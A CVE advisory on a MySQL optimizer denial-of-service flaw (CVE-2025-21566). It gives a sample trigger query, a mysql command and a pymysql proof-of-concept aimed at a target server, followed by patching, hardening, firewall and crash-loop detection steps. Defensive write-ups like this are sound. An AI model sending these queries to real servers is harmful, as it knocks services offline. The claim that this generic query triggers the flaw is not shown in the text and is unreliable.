MySQL, Denial of Service (DoS), CVE-2025-21566 (Medium)

How the Vulnerability Works

CVE-2025-21566 is a vulnerability in MySQL Server’s optimizer component, affecting versions 9.1.0 and prior. The flaw allows a low-privileged attacker with network access to exploit the optimizer’s query processing logic, causing a server crash or persistent hang (DoS). The vulnerability arises when specially crafted SQL queries trigger an infinite loop or memory corruption in the optimizer’s execution plan generation. Attackers can repeatedly send malicious queries, forcing excessive CPU consumption or memory allocation failures, leading to service disruption. The CVSS 3.1 score of 6.5 reflects its impact on availability without compromising data integrity or confidentiality.

DailyCVE Form

Platform: MySQL
Version: ≤ 9.1.0
Vulnerability: DoS
Severity: Medium
Date: 04/08/2025

What Undercode Says:

Exploitation Analysis

1. Malicious Query Example:

SELECT * FROM (SELECT 1 AS a UNION SELECT 2) AS b WHERE b.a IN (SELECT a FROM (SELECT 1 AS a UNION SELECT 2) AS c WHERE c.a = b.a);

This query, which nests correlated subqueries over UNION derived tables, can trigger the optimizer flaw.

2. Exploit Command:

mysql -u lowpriv_user -p -h target_db -e "EXPLAIN <query from step 1>"

3. PoC Script:

import pymysql

# Connect as the low-privileged account described in the advisory
conn = pymysql.connect(host="target_db", user="lowpriv", password="pass")
cursor = conn.cursor()
cursor.execute("<query from step 1>")  # Triggers DoS; placeholder stands for the query shown in step 1

Protection Measures

1. Patch: Upgrade to MySQL 9.1.1 or later.

2. Mitigation: Restrict network access to MySQL ports (3306 by default).

3. Workaround:

REVOKE SELECT ON *.* FROM 'lowpriv_user'@'%';

4. Detection: Monitor logs for repeated optimizer-related crashes:

grep -i "optimizer" /var/log/mysql/error.log

5. Configuration Hardening:

optimizer_switch='derived_merge=off'

6. Network Controls:

iptables -A INPUT -p tcp --dport 3306 -j DROP

7. Audit:

SELECT user, host FROM mysql.user WHERE Select_priv = 'Y';
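Going beyond the grep in step 4, here is an added detection example (not from the advisory and not MySQL's own tooling) that parses MySQL-style error-log lines and alerts on a crash loop: several `starting as process` entries inside a short window, which is how a frequently repeatable optimizer crash shows up on disk. The log lines are constructed samples modelled on the 8.x/9.x error-log layout; the `[MY-…]` codes and the assertion text are illustrative, not output from a real CVE-2025-21566 crash.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed sample lines modelled on the MySQL 8/9 error-log layout (not real crash output):
# two assertion/signal crashes each followed by a restart, then one further restart.
SAMPLE_LOG = """\
2025-04-08T10:00:01.000000Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 9.1.0) starting as process 101
2025-04-08T10:05:10.000000Z 42 [ERROR] [MY-013183] [InnoDB] Assertion failure: optimizer plan invariant violated
10:05:10 UTC - mysqld got signal 11 ;
2025-04-08T10:05:20.000000Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 9.1.0) starting as process 102
2025-04-08T10:06:30.000000Z 57 [ERROR] [MY-013183] [InnoDB] Assertion failure: optimizer plan invariant violated
10:06:30 UTC - mysqld got signal 11 ;
2025-04-08T10:06:40.000000Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 9.1.0) starting as process 103
2025-04-08T10:07:50.000000Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 9.1.0) starting as process 104
"""

TS_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\.\d+Z ")
RESTART_MARKER = "starting as process"
CRASH_MARKERS = ("mysqld got signal", "Assertion failure")


def parse_ts(line):
    """Timestamp of a structured error-log line, or None for untimestamped signal-handler lines."""
    m = TS_RE.match(line)
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S") if m else None


def detect_crash_loop(log_text, max_restarts=3, window=timedelta(minutes=10)):
    """Return (alerts, crash_signature_count).

    An alert fires when `max_restarts` server starts fall inside one sliding `window`;
    a single planned restart never trips it, a crash loop does."""
    alerts, recent_starts, crash_lines = [], deque(), 0
    for line in log_text.splitlines():
        if any(marker in line for marker in CRASH_MARKERS):
            crash_lines += 1
        if RESTART_MARKER not in line:
            continue
        ts = parse_ts(line)
        if ts is None:
            continue
        recent_starts.append(ts)
        while ts - recent_starts[0] > window:   # drop starts that fell out of the window
            recent_starts.popleft()
        if len(recent_starts) >= max_restarts:
            alerts.append(f"{ts.isoformat()}: {len(recent_starts)} mysqld starts within {window}")
            recent_starts.clear()               # one crash loop -> one alert, not one per restart
    return alerts, crash_lines
```

Feed it the real error log (`detect_crash_loop(open("/var/log/mysql/error.log").read())`) from a cron job or log shipper; pairing the restart count with the crash-signature count separates a crash loop from a burst of routine restarts.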

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-21566